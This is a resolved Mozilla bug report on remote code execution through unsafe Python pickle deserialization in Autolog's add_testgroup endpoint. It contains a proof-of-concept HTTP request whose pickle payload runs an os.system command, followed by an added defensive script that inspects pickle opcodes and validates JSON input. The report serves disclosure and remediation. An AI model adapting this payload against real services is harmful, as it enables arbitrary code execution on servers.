Closed
Bug 717118
Opened 14 years ago
Closed 14 years ago
Autolog unserializes user input into objects allowing remote code execution in add_testgroup
Categories
(Testing Graveyard :: Autolog, defect)
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: freddy, Assigned: jgriffin)
Details
(Whiteboard: [infrasec:osinject][ws:critical])
The function add_testgroup will deserialize Python pickle objects from user input.
An attacker can craft his own object with arbitrary code and pickle it locally using cPickle.dumps(). This object will be created on the server side and plays by the attacker's rules.
Please do not use cPickle for data or validate intensively. Using JSON instead is highly encouraged.
Example request:
POST /autologserver/addtestgroup HTTP/1.1
Host: 10.8.73.23
Content-Length: 48
(S'sleep 5;touch PWNED'
p1
ios
system
p2
(dp3
b.
You will see that this request takes about 5 seconds.
I might have created two files, called PWNED and PWN3D for testing purposes.
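Added example, not part of the original report or of Autolog's code: it disassembles a pickle body without unpickling it to show the code-capable opcodes, then parses a submission as JSON with strict field checks, as the report recommends. The field names in `SCHEMA` and the `SAMPLE` bytes are constructed assumptions.

```python
import json
import pickletools

# Opcodes that import or call objects; pickles of plain data never contain them.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "REDUCE", "BUILD",
                "NEWOBJ", "NEWOBJ_EX", "EXT1", "EXT2", "EXT4"}

# Constructed sample: same opcode layout as the request in the report,
# with a harmless command string. It is only disassembled, never unpickled.
SAMPLE = b"(S'echo constructed'\np1\nios\nsystem\np2\n(dp3\nb."

# Hypothetical field names and types; Autolog's real schema is not on the page.
SCHEMA = {"machine": str, "os": str, "testgroup": str, "starttime": int}


def code_opcodes(blob):
    """List (offset, opcode, argument) for code-capable opcodes in a pickle.

    pickletools.genops only disassembles, so this is safe for triaging a
    captured request body. It is not a filter that makes unpickling safe.
    """
    found = []
    try:
        for op, arg, pos in pickletools.genops(blob):
            if op.name in CODE_OPCODES:
                found.append((pos, op.name, arg))
    except Exception:  # truncated or malformed stream
        found.append((None, "MALFORMED", None))
    return found


def parse_testgroup(body):
    """Parse a submission as JSON and accept only the expected scalar fields."""
    try:
        data = json.loads(body)
    except ValueError as exc:  # covers JSONDecodeError and bad UTF-8
        raise ValueError("body is not valid JSON") from exc
    if not isinstance(data, dict) or set(data) != set(SCHEMA):
        raise ValueError("unexpected or missing fields")
    for key, typ in SCHEMA.items():
        if type(data[key]) is not typ:  # exact match, so True is not an int
            raise ValueError("wrong type for field %r" % key)
    return data


if __name__ == "__main__":
    print(code_opcodes(SAMPLE))
```

The `INST` entry carries the module and attribute the stream would import, which is what to look for when reviewing captured request bodies.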
Updated•14 years ago
Assignee: nobody → jgriffin
Comment 1•14 years ago
Fixed as http://hg.mozilla.org/automation/autolog/rev/aea2455268b4 and http://hg.mozilla.org/users/jgriffin_mozilla.com/mozautolog/rev/ea7fd762cfc2
Status: NEW → RESOLVED
Closed: 14 years ago
Resolution: --- → FIXED
Updated•11 years ago
Product: Testing → Testing Graveyard
Updated•11 years ago
Group: mozilla-confidential